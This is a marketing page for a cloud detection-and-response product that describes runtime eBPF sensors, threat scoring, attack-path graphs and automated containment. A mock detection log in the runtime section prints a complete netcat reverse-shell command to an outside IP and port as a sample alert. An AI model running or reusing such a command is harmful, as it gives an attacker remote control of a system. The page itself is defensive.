Cloud Detection & Response

Catch the attack
as it happens.

Attackers move in minutes — your SOC has hours. OnDuty CDR correlates eBPF runtime telemetry, cloud audit logs and identity activity into a single live threat graph, with response actions built in.

Autonomous detect & respond

From first signal to contained.

OnDuty CDR closes the loop between observation and action. Runtime, identity and control-plane signals converge, get scored against MITRE ATT&CK, and trigger response playbooks — automatically or with a single click.

Response actions are approval-gatedMedian containment in secondsEvery action is audit-logged

Observe

eBPF sensors capture every process, syscall and API call

Correlate

Runtime, identity and network signals merge into one graph

Detect

150+ MITRE ATT&CK detections surface the attack story

Respond

Isolate, revoke or trigger SOAR — one click or automatic

How it works

Every signal. One incident timeline.

From the first eBPF heartbeat to a contained incident — six layers of intelligence that turn cloud noise into a focused response.

Runtime detection

eBPF sensors see every process, syscall and packet.

OnDuty deploys agentless eBPF sensors across every workload — no code changes, no sidecars. Process launches, file writes, outbound connections and syscalls stream in real time so reverse shells, crypto-miners and file-integrity events surface within seconds of the first indicator.

eBPF runtime sensorNo code changes<3s detection latency
ebpf-sensor · prod-web-01
exec: /usr/bin/nginxpid=1428 · uid=101
exec: /bin/sh -c 'nc -e /bin/sh 185.220.101.4 4444'T1059 · reverse_shell
connect: 185.220.101.4:4444outbound · TOR exit node
assume-role: prod-deploy from SGT1078 · impossible travel
incident: opened INC-4211sev=critical · confidence=0.97
Threat prioritization

Real threats first — noise auto-suppressed.

The OnDuty threat score fuses runtime behavior, identity risk and control-plane anomalies, then weights every alert by exploit context — whether an attacker actually reached a workload, moved laterally, or touched a crown-jewel asset. Repeat noise and known-benign patterns are auto-baselined so your responders only see the ones that matter.

Unified threat scoreBehavioral baselining98% alerts auto-triaged

Live incidents · sorted by OnDuty threat score

IncidentINC-4211
Contain now
Base → OnDuty↑ 1.3 pts escalated
Base
8.4
OnDuty
9.7
Confidence97%
Seen in wildYes
Runtime activeConfirmed
Attack path mapping

See the whole kill chain, not one alert at a time.

Runtime, identity and network signals stitch into a single live threat graph. One view shows exactly how an attacker landed on a workload, assumed a role, and pivoted toward sensitive data — with blast-radius modeling for every ongoing incident.

Live threat graphLateral-movement mappingBlast-radius modeling

Live kill chain — INC-4211

attacker → nginx → assumed role → crown jewel

Attacker185.220.101.4checkout-apiT1190 initial accessnginx workerT1059 reverse shellrole/prod-deployT1078 assume-roleCrown Jewelcustomer-data DB

Kill chain stages

4 / 4

Initial access → RCE → lateral → data

Confidence

0.97

Runtime + identity + network agreement

Time to detect

2.4s

First indicator to opened incident

Detection intelligence

150+ MITRE ATT&CK detections, always current.

Curated detections for cloud, container and identity attacks — mapped to MITRE ATT&CK for Cloud and enriched with live threat intel. New TTPs land as detection updates within hours, not release cycles.

MITRE ATT&CK mappedThreat-intel enrichmentLive rule updates
AI incident reasoning

Every incident, explained in plain English.

Each incident ships with an LLM-written narrative citing the exact runtime, identity and audit evidence behind it — a shareable story your responders can act on, your CISO can brief, and your auditors can defend.

Evidence-cited narrativeKill-chain summaryAuditor-ready output
OnDuty AI Reasoning
generating

+2.0

eBPF

+1.8

C2 IP

+1.5

Identity

+1.5

Baseline

Evidence cited
Kill-chain summary
Auditor-ready
Automated response

Kill, isolate, revoke — one click or automatic.

Response playbooks kill a rogue process, quarantine a workload, revoke a session or disable a leaked key — triggered automatically for high-confidence detections or with a single click for the rest. Every action integrates with Slack, PagerDuty and your SOAR of choice.

Auto-isolation playbooksSession & key revocationSOAR integrations

INC-4211 · Reverse shell

TTR: 0s
→ auto-isolate
contained

INC-4207 · Impossible travel

TTR: 1-click
→ revoke-session
awaiting approval

INC-4189 · Leaked AWS key

TTR: 0s
→ disable-key
resolved
Response posture

2

active

5

contained

92

resolved

Stop chasing alerts

Catch the attack
before it spreads.

See real detections, response playbooks and the live threat graph in a 30-min guided demo with our team.

  • <3s median detection — eBPF runtime, no sidecars
  • One live threat graph across runtime, identity and cloud audit
  • 150+ MITRE ATT&CK-mapped detections, auto-baselined to your env
  • One-click isolate, revoke and SOAR playbooks built in
  • Evidence for your SOC 2 · ISO 27001 · HIPAA · PCI audits